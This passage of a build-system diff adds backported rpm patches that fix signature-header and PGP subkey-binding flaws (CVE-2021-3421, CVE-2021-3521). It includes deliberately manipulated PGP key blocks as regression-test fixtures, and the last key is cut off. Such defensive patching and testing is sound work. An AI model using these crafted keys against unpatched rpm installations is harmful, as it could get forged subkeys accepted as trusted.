+ blob->pe = (entryInfo) &(blob->ei[2]);
+ blob->pvlen = sizeof(blob->il) + sizeof(blob->dl) +
+ (blob->il * sizeof(*blob->pe)) + blob->dl;
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3421.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3421.patch
new file mode 100644
index 0000000000..b1a05b6863
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3421.patch
@@ -0,0 +1,197 @@
+From 1e5b70cab83c95aa138107a38ecda75ff70e8985 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
+Date: Thu, 24 Jun 2021 01:11:26 +0000
+Subject: [PATCH] Be much more careful about copying data from the signature
+ header
+
+Only look for known tags, and ensure correct type and size where known
+before copying over. Bump the old arbitrary 16k count limit to 16M limit
+though, it's not inconceivable that a package could have that many files.
+While at it, ensure none of these tags exist in the main header,
+which would confuse us greatly.
+
+This is optimized for backporting ease, upstream can remove redundancies
+and further improve checking later.
+
+Reported and initial patches by Demi Marie Obenour.
+
+Fixes: RhBug:1935049, RhBug:1933867, RhBug:1935035, RhBug:1934125, ...
+
+Fixes: CVE-2021-3421, CVE-2021-20271
+
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/d6a86b5e69e46cc283b1e06c92343319beb42e21]
+CVE: CVE-2021-3421
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ lib/package.c | 115 ++++++++++++++++++++++++--------------------------
+ lib/rpmtag.h | 4 ++
+ 2 files changed, 58 insertions(+), 61 deletions(-)
+
+diff --git a/lib/package.c b/lib/package.c
+index 081123d84e..7c26ea323f 100644
+--- a/lib/package.c
++++ b/lib/package.c
+@@ -20,76 +20,68 @@
+
+ #include "debug.h"
+
++struct taglate_s {
++ rpmTagVal stag;
++ rpmTagVal xtag;
++ rpm_count_t count;
++} const xlateTags[] = {
++ { RPMSIGTAG_SIZE, RPMTAG_SIGSIZE, 1 },
++ { RPMSIGTAG_PGP, RPMTAG_SIGPGP, 0 },
++ { RPMSIGTAG_MD5, RPMTAG_SIGMD5, 16 },
++ { RPMSIGTAG_GPG, RPMTAG_SIGGPG, 0 },
++ /* { RPMSIGTAG_PGP5, RPMTAG_SIGPGP5, 0 }, */ /* long obsolete, dont use */
++ { RPMSIGTAG_PAYLOADSIZE, RPMTAG_ARCHIVESIZE, 1 },
++ { RPMSIGTAG_FILESIGNATURES, RPMTAG_FILESIGNATURES, 0 },
++ { RPMSIGTAG_FILESIGNATURELENGTH, RPMTAG_FILESIGNATURELENGTH, 1 },
++ { RPMSIGTAG_SHA1, RPMTAG_SHA1HEADER, 1 },
++ { RPMSIGTAG_SHA256, RPMTAG_SHA256HEADER, 1 },
++ { RPMSIGTAG_DSA, RPMTAG_DSAHEADER, 0 },
++ { RPMSIGTAG_RSA, RPMTAG_RSAHEADER, 0 },
++ { RPMSIGTAG_LONGSIZE, RPMTAG_LONGSIGSIZE, 1 },
++ { RPMSIGTAG_LONGARCHIVESIZE, RPMTAG_LONGARCHIVESIZE, 1 },
++ { 0 }
++};
++
+ /** \ingroup header
+ * Translate and merge legacy signature tags into header.
+ * @param h header (dest)
+ * @param sigh signature header (src)
+ */
+ static
+-void headerMergeLegacySigs(Header h, Header sigh)
++rpmTagVal headerMergeLegacySigs(Header h, Header sigh, char **msg)
+ {
+- HeaderIterator hi;
++ const struct taglate_s *xl;
+ struct rpmtd_s td;
+
+- hi = headerInitIterator(sigh);
+- for (; headerNext(hi, &td); rpmtdFreeData(&td))
+- {
+- switch (td.tag) {
+- /* XXX Translate legacy signature tag values. */
+- case RPMSIGTAG_SIZE:
+- td.tag = RPMTAG_SIGSIZE;
+- break;
+- case RPMSIGTAG_PGP:
+- td.tag = RPMTAG_SIGPGP;
+- break;
+- case RPMSIGTAG_MD5:
+- td.tag = RPMTAG_SIGMD5;
+- break;
+- case RPMSIGTAG_GPG:
+- td.tag = RPMTAG_SIGGPG;
+- break;
+- case RPMSIGTAG_PGP5:
+- td.tag = RPMTAG_SIGPGP5;
+- break;
+- case RPMSIGTAG_PAYLOADSIZE:
+- td.tag = RPMTAG_ARCHIVESIZE;
+- break;
+- case RPMSIGTAG_SHA1:
+- case RPMSIGTAG_SHA256:
+- case RPMSIGTAG_DSA:
+- case RPMSIGTAG_RSA:
+- default:
+- if (!(td.tag >= HEADER_SIGBASE && td.tag < HEADER_TAGBASE))
+- continue;
+- break;
+- }
+- if (!headerIsEntry(h, td.tag)) {
+- switch (td.type) {
+- case RPM_NULL_TYPE:
+- continue;
+- break;
+- case RPM_CHAR_TYPE:
+- case RPM_INT8_TYPE:
+- case RPM_INT16_TYPE:
+- case RPM_INT32_TYPE:
+- case RPM_INT64_TYPE:
+- if (td.count != 1)
+- continue;
+- break;
+- case RPM_STRING_TYPE:
+- case RPM_BIN_TYPE:
+- if (td.count >= 16*1024)
+- continue;
+- break;
+- case RPM_STRING_ARRAY_TYPE:
+- case RPM_I18NSTRING_TYPE:
+- continue;
+- break;
+- }
+- (void) headerPut(h, &td, HEADERPUT_DEFAULT);
+- }
++ rpmtdReset(&td);
++ for (xl = xlateTags; xl->stag; xl++) {
++ /* There mustn't be one in the main header */
++ if (headerIsEntry(h, xl->xtag))
++ break;
++ if (headerGet(sigh, xl->stag, &td, HEADERGET_RAW|HEADERGET_MINMEM)) {
++ /* Translate legacy tags */
++ if (xl->stag != xl->xtag)
++ td.tag = xl->xtag;
++ /* Ensure type and tag size match expectations */
++ if (td.type != rpmTagGetTagType(td.tag))
++ break;
++ if (td.count < 1 || td.count > 16*1024*1024)
++ break;
++ if (xl->count && td.count != xl->count)
++ break;
++ if (!headerPut(h, &td, HEADERPUT_DEFAULT))
++ break;
++ rpmtdFreeData(&td);
++ }
++ }
++ rpmtdFreeData(&td);
++
++ if (xl->stag) {
++ rasprintf(msg, "invalid signature tag %s (%d)",
++ rpmTagGetName(xl->xtag), xl->xtag);
+ }
+- headerFreeIterator(hi);
++
++ return xl->stag;
+ }
+
+ /**
+@@ -337,7 +329,8 @@ rpmRC rpmReadPackageFile(rpmts ts, FD_t fd, const char * fn, Header * hdrp)
+ goto exit;
+
+ /* Append (and remap) signature tags to the metadata. */
+- headerMergeLegacySigs(h, sigh);
++ if (headerMergeLegacySigs(h, sigh,&msg))
++ goto exit;
+ applyRetrofits(h);
+
+ /* Bump reference count for return. */
+diff --git a/lib/rpmtag.h b/lib/rpmtag.h
+index 8c718b31b5..d562572c6f 100644
+--- a/lib/rpmtag.h
++++ b/lib/rpmtag.h
+@@ -65,6 +65,8 @@ typedef enum rpmTag_e {
+ RPMTAG_LONGARCHIVESIZE = RPMTAG_SIG_BASE+15, /* l */
+ /* RPMTAG_SIG_BASE+16 reserved */
+ RPMTAG_SHA256HEADER = RPMTAG_SIG_BASE+17, /* s */
++ /* RPMTAG_SIG_BASE+18 reserved for RPMSIGTAG_FILESIGNATURES */
++ /* RPMTAG_SIG_BASE+19 reserved for RPMSIGTAG_FILESIGNATURELENGTH */
+
+ RPMTAG_NAME = 1000, /* s */
+ #define RPMTAG_N RPMTAG_NAME /* s */
+@@ -422,6 +424,8 @@ typedef enum rpmSigTag_e {
+ RPMSIGTAG_LONGSIZE = RPMTAG_LONGSIGSIZE, /*!< internal Header+Payload size (64bit) in bytes. */
+ RPMSIGTAG_LONGARCHIVESIZE = RPMTAG_LONGARCHIVESIZE, /*!< internal uncompressed payload size (64bit) in bytes. */
+ RPMSIGTAG_SHA256 = RPMTAG_SHA256HEADER,
++ RPMSIGTAG_FILESIGNATURES = RPMTAG_SIG_BASE + 18,
++ RPMSIGTAG_FILESIGNATURELENGTH = RPMTAG_SIG_BASE + 19,
+ } rpmSigTag;
+
+
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch
new file mode 100644
index 0000000000..0882d6f310
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch
@@ -0,0 +1,60 @@
+From b5e8bc74b2b05aa557f663fe227b94d2bc64fbd8 Mon Sep 17 00:00:00 2001
+From: Panu Matilainen <pmatilai@redhat.com>
+Date: Thu, 30 Sep 2021 09:51:10 +0300
+Subject: [PATCH] Process MPI's from all kinds of signatures
+
+No immediate effect but needed by the following commits.
+
+Dependent patch:
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/b5e8bc74b2b05aa557f663fe227b94d2bc64fbd8]
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+---
+ rpmio/rpmpgp.c | 12 +++++-------
+ 1 file changed, 5 insertions(+), 7 deletions(-)
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index ee5c81e246..340de5fc9a 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -511,7 +511,7 @@ pgpDigAlg pgpDigAlgFree(pgpDigAlg alg)
+ return NULL;
+ }
+
+-static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo, uint8_t sigtype,
++static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo,
+ const uint8_t *p, const uint8_t *h, size_t hlen,
+ pgpDigParams sigp)
+ {
+@@ -524,10 +524,8 @@ static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo, uint8_t sigtype,
+ int mpil = pgpMpiLen(p);
+ if (p + mpil > pend)
+ break;
+- if (sigtype == PGPSIGTYPE_BINARY || sigtype == PGPSIGTYPE_TEXT) {
+- if (sigalg->setmpi(sigalg, i, p))
+- break;
+- }
++ if (sigalg->setmpi(sigalg, i, p))
++ break;
+ p += mpil;
+ }
+
+@@ -600,7 +598,7 @@ static int pgpPrtSig(pgpTag tag, const uint8_t *h, size_t hlen,
+ }
+
+ p = ((uint8_t *)v) + sizeof(*v);
+- rc = pgpPrtSigParams(tag, v->pubkey_algo, v->sigtype, p, h, hlen, _digp);
++ rc = pgpPrtSigParams(tag, v->pubkey_algo, p, h, hlen, _digp);
+ } break;
+ case 4:
+ { pgpPktSigV4 v = (pgpPktSigV4)h;
+@@ -658,7 +656,7 @@ static int pgpPrtSig(pgpTag tag, const uint8_t *h, size_t hlen,
+ if (p > (h + hlen))
+ return 1;
+
+- rc = pgpPrtSigParams(tag, v->pubkey_algo, v->sigtype, p, h, hlen, _digp);
++ rc = pgpPrtSigParams(tag, v->pubkey_algo, p, h, hlen, _digp);
+ } break;
+ default:
+ rpmlog(RPMLOG_WARNING, _("Unsupported version of key: V%d\n"), version);
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch
new file mode 100644
index 0000000000..c5f88a8c72
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch
@@ -0,0 +1,55 @@
+From 9f03f42e2614a68f589f9db8fe76287146522c0c Mon Sep 17 00:00:00 2001
+From: Panu Matilainen <pmatilai@redhat.com>
+Date: Thu, 30 Sep 2021 09:56:20 +0300
+Subject: [PATCH] Refactor pgpDigParams construction to helper function
+
+No functional changes, just to reduce code duplication and needed by
+the following commits.
+
+Dependent patch:
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/9f03f42e2614a68f589f9db8fe76287146522c0c]
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+---
+ rpmio/rpmpgp.c | 13 +++++++++----
+ 1 file changed, 9 insertions(+), 4 deletions(-)
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index 340de5fc9a..aad7c275c9 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -1055,6 +1055,13 @@ unsigned int pgpDigParamsAlgo(pgpDigParams digp, unsigned int algotype)
+ return algo;
+ }
+
++static pgpDigParams pgpDigParamsNew(uint8_t tag)
++{
++ pgpDigParams digp = xcalloc(1, sizeof(*digp));
++ digp->tag = tag;
++ return digp;
++}
++
+ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ pgpDigParams * ret)
+ {
+@@ -1072,8 +1079,7 @@ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ if (pkttype && pkt.tag != pkttype) {
+ break;
+ } else {
+- digp = xcalloc(1, sizeof(*digp));
+- digp->tag = pkt.tag;
++ digp = pgpDigParamsNew(pkt.tag);
+ }
+ }
+
+@@ -1121,8 +1127,7 @@ int pgpPrtParamsSubkeys(const uint8_t *pkts, size_t pktlen,
+ digps = xrealloc(digps, alloced * sizeof(*digps));
+ }
+
+- digps[count] = xcalloc(1, sizeof(**digps));
+- digps[count]->tag = PGPTAG_PUBLIC_SUBKEY;
++ digps[count] = pgpDigParamsNew(PGPTAG_PUBLIC_SUBKEY);
+ /* Copy UID from main key to subkey */
+ digps[count]->userid = xstrdup(mainkey->userid);
+
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch
new file mode 100644
index 0000000000..fd31f11beb
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch
@@ -0,0 +1,34 @@
+From 5ff86764b17f31535cb247543a90dd739076ec38 Mon Sep 17 00:00:00 2001
+From: Demi Marie Obenour <demi@invisiblethingslab.com>
+Date: Thu, 6 May 2021 18:34:45 -0400
+Subject: [PATCH] Do not allow extra packets to follow a signature
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+According to RFC 4880 § 11.4, a detached signature is “simply a
+Signature packet”. Therefore, extra packets following a detached
+signature are not allowed.
+
+Dependent patch:
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/5ff86764b17f31535cb247543a90dd739076ec38]
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+---
+ rpmio/rpmpgp.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index f1a99e7169..5b346a8253 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -1068,6 +1068,8 @@ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ break;
+
+ p += (pkt.body - pkt.head) + pkt.blen;
++ if (pkttype == PGPTAG_SIGNATURE)
++ break;
+ }
+
+ rc = (digp && (p == pend)) ? 0 : -1;
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521.patch
new file mode 100644
index 0000000000..cb9e9842fe
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521.patch
@@ -0,0 +1,330 @@
+From bd36c5dc9fb6d90c46fbfed8c2d67516fc571ec8 Mon Sep 17 00:00:00 2001
+From: Panu Matilainen <pmatilai@redhat.com>
+Date: Thu, 30 Sep 2021 09:59:30 +0300
+Subject: [PATCH] Validate and require subkey binding signatures on PGP public
+ keys
+
+All subkeys must be followed by a binding signature by the primary key
+as per the OpenPGP RFC, enforce the presence and validity in the parser.
+
+The implementation is as kludgey as they come to work around our
+simple-minded parser structure without touching API, to maximise
+backportability. Store all the raw packets internally as we decode them
+to be able to access previous elements at will, needed to validate ordering
+and access the actual data. Add testcases for manipulated keys whose
+import previously would succeed.
+
+Depends on the two previous commits:
+7b399fcb8f52566e6f3b4327197a85facd08db91 and
+236b802a4aa48711823a191d1b7f753c82a89ec5
+
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/bd36c5dc9fb6d90c46fbfed8c2d67516fc571ec8]
+Comment: Hunk refreshed
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+Fixes CVE-2021-3521.
+---
+ rpmio/rpmpgp.c | 98 +++++++++++++++++--
+ tests/Makefile.am | 3 +
+ tests/data/keys/CVE-2021-3521-badbind.asc | 25 +++++
+ .../data/keys/CVE-2021-3521-nosubsig-last.asc | 25 +++++
+ tests/data/keys/CVE-2021-3521-nosubsig.asc | 37 +++++++
+ tests/rpmsigdig.at | 28 ++++++
+ 6 files changed, 209 insertions(+), 7 deletions(-)
+ create mode 100644 tests/data/keys/CVE-2021-3521-badbind.asc
+ create mode 100644 tests/data/keys/CVE-2021-3521-nosubsig-last.asc
+ create mode 100644 tests/data/keys/CVE-2021-3521-nosubsig.asc
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index aad7c275c9..d70802ae86 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -1004,37 +1004,121 @@ static pgpDigParams pgpDigParamsNew(uint8_t tag)
+ return digp;
+ }
+
++static int hashKey(DIGEST_CTX hash, const struct pgpPkt *pkt, int exptag)
++{
++ int rc = -1;
++ if (pkt->tag == exptag) {
++ uint8_t head[] = {
++ 0x99,
++ (pkt->blen >> 8),
++ (pkt->blen ),
++ };
++
++ rpmDigestUpdate(hash, head, 3);
++ rpmDigestUpdate(hash, pkt->body, pkt->blen);
++ rc = 0;
++ }
++ return rc;
++}
++
++static int pgpVerifySelf(pgpDigParams key, pgpDigParams selfsig,
++ const struct pgpPkt *all, int i)
++{
++ int rc = -1;
++ DIGEST_CTX hash = NULL;
++
++ switch (selfsig->sigtype) {
++ case PGPSIGTYPE_SUBKEY_BINDING:
++ hash = rpmDigestInit(selfsig->hash_algo, 0);
++ if (hash) {
++ rc = hashKey(hash, &all[0], PGPTAG_PUBLIC_KEY);
++ if (!rc)
++ rc = hashKey(hash, &all[i-1], PGPTAG_PUBLIC_SUBKEY);
++ }
++ break;
++ default:
++ /* ignore types we can't handle */
++ rc = 0;
++ break;
++ }
++
++ if (hash && rc == 0)
++ rc = pgpVerifySignature(key, selfsig, hash);
++
++ rpmDigestFinal(hash, NULL, NULL, 0);
++
++ return rc;
++}
++
+ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ pgpDigParams * ret)
+ {
+ const uint8_t *p = pkts;
+ const uint8_t *pend = pkts + pktlen;
+ pgpDigParams digp = NULL;
+- struct pgpPkt pkt;
++ pgpDigParams selfsig = NULL;
++ int i = 0;
++ int alloced = 16; /* plenty for normal cases */
++ struct pgpPkt *all = xmalloc(alloced * sizeof(*all));
+ int rc = -1; /* assume failure */
++ int expect = 0;
++ int prevtag = 0;
+
+ while (p < pend) {
+- if (decodePkt(p, (pend - p), &pkt))
++ struct pgpPkt *pkt = &all[i];
++ if (decodePkt(p, (pend - p), pkt))
+ break;
+
+ if (digp == NULL) {
+- if (pkttype && pkt.tag != pkttype) {
++ if (pkttype && pkt->tag != pkttype) {
+ break;
+ } else {
+- digp = pgpDigParamsNew(pkt.tag);
++ digp = pgpDigParamsNew(pkt->tag);
+ }
+ }
+
+- if (pgpPrtPkt(&pkt, digp))
++ if (expect) {
++ if (pkt->tag != expect)
++ break;
++ selfsig = pgpDigParamsNew(pkt->tag);
++ }
++
++ if (pgpPrtPkt(pkt, selfsig ? selfsig : digp))
+ break;
+
+- p += (pkt.body - pkt.head) + pkt.blen;
++ if (selfsig) {
++ /* subkeys must be followed by binding signature */
++ if (prevtag == PGPTAG_PUBLIC_SUBKEY) {
++ if (selfsig->sigtype != PGPSIGTYPE_SUBKEY_BINDING)
++ break;
++ }
++
++ int xx = pgpVerifySelf(digp, selfsig, all, i);
++
++ selfsig = pgpDigParamsFree(selfsig);
++ if (xx)
++ break;
++ expect = 0;
++ }
++
++ if (pkt->tag == PGPTAG_PUBLIC_SUBKEY)
++ expect = PGPTAG_SIGNATURE;
++ prevtag = pkt->tag;
++
++ i++;
++ p += (pkt->body - pkt->head) + pkt->blen;
+ if (pkttype == PGPTAG_SIGNATURE)
+ break;
++
++ if (alloced <= i) {
++ alloced *= 2;
++ all = xrealloc(all, alloced * sizeof(*all));
++ }
+ }
+
+- rc = (digp && (p == pend)) ? 0 : -1;
++ rc = (digp && (p == pend) && expect == 0) ? 0 : -1;
+
++ free(all);
+ if (ret && rc == 0) {
+ *ret = digp;
+ } else {
+diff --git a/tests/Makefile.am b/tests/Makefile.am
+index b4a2e2e1ce..bc535d2833 100644
+--- a/tests/Makefile.am
++++ b/tests/Makefile.am
+@@ -87,6 +87,9 @@ EXTRA_DIST += data/SPECS/hello-config-buildid.spec
+ EXTRA_DIST += data/SPECS/hello-cd.spec
+ EXTRA_DIST += data/keys/rpm.org-rsa-2048-test.pub
+ EXTRA_DIST += data/keys/rpm.org-rsa-2048-test.secret
++EXTRA_DIST += data/keys/CVE-2021-3521-badbind.asc
++EXTRA_DIST += data/keys/CVE-2021-3521-nosubsig.asc
++EXTRA_DIST += data/keys/CVE-2021-3521-nosubsig-last.asc
+ EXTRA_DIST += data/macros.testfile
+
+ # testsuite voodoo
+diff --git a/tests/data/keys/CVE-2021-3521-badbind.asc b/tests/data/keys/CVE-2021-3521-badbind.asc
+new file mode 100644
+index 0000000000..aea00f9d7a
+--- /dev/null
++++ b/tests/data/keys/CVE-2021-3521-badbind.asc
+@@ -0,0 +1,25 @@
++-----BEGIN PGP PUBLIC KEY BLOCK-----
++Version: rpm-4.17.90 (NSS-3)
++
++mQENBFjmORgBCAC7TMEk6wnjSs8Dr4yqSScWdU2pjcqrkTxuzdWvowcIUPZI0w/g
++HkRqGd4apjvY2V15kjL10gk3QhFP3pZ/9p7zh8o8NHX7aGdSGDK7NOq1eFaErPRY
++91LW9RiZ0lbOjXEzIL0KHxUiTQEmdXJT43DJMFPyW9fkCWg0OltiX618FUdWWfI8
++eySdLur1utnqBvdEbCUvWK2RX3vQZQdvEBODnNk2pxqTyV0w6VPQ96W++lF/5Aas
++7rUv3HIyIXxIggc8FRrnH+y9XvvHDonhTIlGnYZN4ubm9i4y3gOkrZlGTrEw7elQ
++1QeMyG2QQEbze8YjpTm4iLABCBrRfPRaQpwrABEBAAG0IXJwbS5vcmcgUlNBIHRl
++c3RrZXkgPHJzYUBycG0ub3JnPokBNwQTAQgAIQUCWOY5GAIbAwULCQgHAgYVCAkK
++CwIEFgIDAQIeAQIXgAAKCRBDRFkeGWTF/MxxCACnjqFL+MmPh9W9JQKT2DcLbBzf
++Cqo6wcEBoCOcwgRSk8dSikhARoteoa55JRJhuMyeKhhEAogE9HRmCPFdjezFTwgB
++BDVBpO2dZ023mLXDVCYX3S8pShOgCP6Tn4wqCnYeAdLcGg106N4xcmgtcssJE+Pr
++XzTZksbZsrTVEmL/Ym+R5w5jBfFnGk7Yw7ndwfQsfNXQb5AZynClFxnX546lcyZX
++fEx3/e6ezw57WNOUK6WT+8b+EGovPkbetK/rGxNXuWaP6X4A/QUm8O98nCuHYFQq
+++mvNdsCBqGf7mhaRGtpHk/JgCn5rFvArMDqLVrR9hX0LdCSsH7EGE+bR3r7wuQEN
++BFjmORgBCACk+vDZrIXQuFXEYToZVwb2attzbbJJCqD71vmZTLsW0QxuPKRgbcYY
++zp4K4lVBnHhFrF8MOUOxJ7kQWIJZMZFt+BDcptCYurbD2H4W2xvnWViiC+LzCMzz
++iMJT6165uefL4JHTDPxC2fFiM9yrc72LmylJNkM/vepT128J5Qv0gRUaQbHiQuS6
++Dm/+WRnUfx3i89SV4mnBxb/Ta93GVqoOciWwzWSnwEnWYAvOb95JL4U7c5J5f/+c
++KnQDHsW7sIiIdscsWzvgf6qs2Ra1Zrt7Fdk4+ZS2f/adagLhDO1C24sXf5XfMk5m
++L0OGwZSr9m5s17VXxfspgU5ugc8kBJfzABEBAAE=
++=WCfs
++-----END PGP PUBLIC KEY BLOCK-----
++
+diff --git a/tests/data/keys/CVE-2021-3521-nosubsig-last.asc b/tests/data/keys/CVE-2021-3521-nosubsig-last.asc
+new file mode 100644
+index 0000000000..aea00f9d7a
+--- /dev/null
++++ b/tests/data/keys/CVE-2021-3521-nosubsig-last.asc
+@@ -0,0 +1,25 @@
++-----BEGIN PGP PUBLIC KEY BLOCK-----
++Version: rpm-4.17.90 (NSS-3)
++
++mQENBFjmORgBCAC7TMEk6wnjSs8Dr4yqSScWdU2pjcqrkTxuzdWvowcIUPZI0w/g
++HkRqGd4apjvY2V15kjL10gk3QhFP3pZ/9p7zh8o8NHX7aGdSGDK7NOq1eFaErPRY
++91LW9RiZ0lbOjXEzIL0KHxUiTQEmdXJT43DJMFPyW9fkCWg0OltiX618FUdWWfI8
++eySdLur1utnqBvdEbCUvWK2RX3vQZQdvEBODnNk2pxqTyV0w6VPQ96W++lF/5Aas
++7rUv3HIyIXxIggc8FRrnH+y9XvvHDonhTIlGnYZN4ubm9i4y3gOkrZlGTrEw7elQ
++1QeMyG2QQEbze8YjpTm4iLABCBrRfPRaQpwrABEBAAG0IXJwbS5vcmcgUlNBIHRl
++c3RrZXkgPHJzYUBycG0ub3JnPokBNwQTAQgAIQUCWOY5GAIbAwULCQgHAgYVCAkK
++CwIEFgIDAQIeAQIXgAAKCRBDRFkeGWTF/MxxCACnjqFL+MmPh9W9JQKT2DcLbBzf
++Cqo6wcEBoCOcwgRSk8dSikhARoteoa55JRJhuMyeKhhEAogE9HRmCPFdjezFTwgB
++BDVBpO2dZ023mLXDVCYX3S8pShOgCP6Tn4wqCnYeAdLcGg106N4xcmgtcssJE+Pr
++XzTZksbZsrTVEmL/Ym+R5w5jBfFnGk7Yw7ndwfQsfNXQb5AZynClFxnX546lcyZX
++fEx3/e6ezw57WNOUK6WT+8b+EGovPkbetK/rGxNXuWaP6X4A/QUm8O98nCuHYFQq
+++mvNdsCBqGf7mhaRGtpHk/JgCn5rFvArMDqLVrR9hX0LdCSsH7EGE+bR3r7wuQEN
++BFjmORgBCACk+vDZrIXQuFXEYToZVwb2attzbbJJCqD71vmZTLsW0QxuPKRgbcYY
++zp4K4lVBnHhFrF8MOUOxJ7kQWIJZMZFt+BDcptCYurbD2H4W2xvnWViiC+LzCMzz
++iMJT6165uefL4JHTDPxC2fFiM9yrc72LmylJNkM/vepT128J5Qv0gRUaQbHiQuS6
++Dm/+WRnUfx3i89SV4mnBxb/Ta93GVqoOciWwzWSnwEnWYAvOb95JL4U7c5J5f/+c
++KnQDHsW7sIiIdscsWzvgf6qs2Ra1Zrt7Fdk4+ZS2f/adagLhDO1C24sXf5XfMk5m
++L0OGwZSr9m5s17VXxfspgU5ugc8kBJfzABEBAAE=
++=WCfs
++-----END PGP PUBLIC KEY BLOCK-----
++
+diff --git a/tests/data/keys/CVE-2021-3521-nosubsig.asc b/tests/data/keys/CVE-2021-3521-nosubsig.asc
+new file mode 100644
+index 0000000000..3a2e7417f8
+--- /dev/null
++++ b/tests/data/keys/CVE-2021-3521-nosubsig.asc
+@@ -0,0 +1,37 @@
++-----BEGIN PGP PUBLIC KEY BLOCK-----
++Version: rpm-4.17.90 (NSS-3)
++
++mQENBFjmORgBCAC7TMEk6wnjSs8Dr4yqSScWdU2pjcqrkTxuzdWvowcIUPZI0w/g
++HkRqGd4apjvY2V15kjL10gk3QhFP3pZ/9p7zh8o8NHX7aGdSGDK7NOq1eFaErPRY
++91LW9RiZ0lbOjXEzIL0KHxUiTQEmdXJT43DJMFPyW9fkCWg0OltiX618FUdWWfI8
++eySdLur1utnqBvdEbCUvWK2RX3vQZQdvEBODnNk2pxqTyV0w6VPQ96W++lF/5Aas
++7rUv3HIyIXxIggc8FRrnH+y9XvvHDonhTIlGnYZN4ubm9i4y3gOkrZlGTrEw7elQ
++1QeMyG2QQEbze8YjpTm4iLABCBrRfPRaQpwrABEBAAG0IXJwbS5vcmcgUlNBIHRl
++c3RrZXkgPHJzYUBycG0ub3JnPokBNwQTAQgAIQUCWOY5GAIbAwULCQgHAgYVCAkK
++CwIEFgIDAQIeAQIXgAAKCRBDRFkeGWTF/MxxCACnjqFL+MmPh9W9JQKT2DcLbBzf
++Cqo6wcEBoCOcwgRSk8dSikhARoteoa55JRJhuMyeKhhEAogE9HRmCPFdjezFTwgB
++BDVBpO2dZ023mLXDVCYX3S8pShOgCP6Tn4wqCnYeAdLcGg106N4xcmgtcssJE+Pr
++XzTZksbZsrTVEmL/Ym+R5w5jBfFnGk7Yw7ndwfQsfNXQb5AZynClFxnX546lcyZX
++fEx3/e6ezw57WNOUK6WT+8b+EGovPkbetK/rGxNXuWaP6X4A/QUm8O98nCuHYFQq
+++mvNdsCBqGf7mhaRGtpHk/JgCn5rFvArMDqLVrR9hX0LdCSsH7EGE+bR3r7wuQEN
++BFjmORgBCACk+vDZrIXQuFXEYToZVwb2attzbbJJCqD71vmZTLsW0QxuPKRgbcYY
++zp4K4lVBnHhFrF8MOUOxJ7kQWIJZMZFt+BDcptCYurbD2H4W2xvnWViiC+LzCMzz
++iMJT6165uefL4JHTDPxC2fFiM9yrc72LmylJNkM/vepT128J5Qv0gRUaQbHiQuS6
++Dm/+WRnUfx3i89SV4mnBxb/Ta93GVqoOciWwzWSnwEnWYAvOb95JL4U7c5J5f/+c
++KnQDHsW7sIiIdscsWzvgf6qs2Ra1Zrt7Fdk4+ZS2f/adagLhDO1C24sXf5XfMk5m
++L0OGwZSr9m5s17VXxfspgU5ugc8kBJfzABEBAAG5AQ0EWOY5GAEIAKT68NmshdC4
++VcRhOhlXBvZq23NtskkKoPvW+ZlMuxbRDG48pGBtxhjOngriVUGceEWsXww5Q7En
++uRBYglkxkW34ENym0Ji6tsPYfhbbG+dZWKIL4vMIzPOIwlPrXrm558vgkdMM/ELZ
++8WIz3KtzvYubKUk2Qz+96lPXbwnlC/SBFRpBseJC5LoOb/5ZGdR/HeLz1JXiacHF
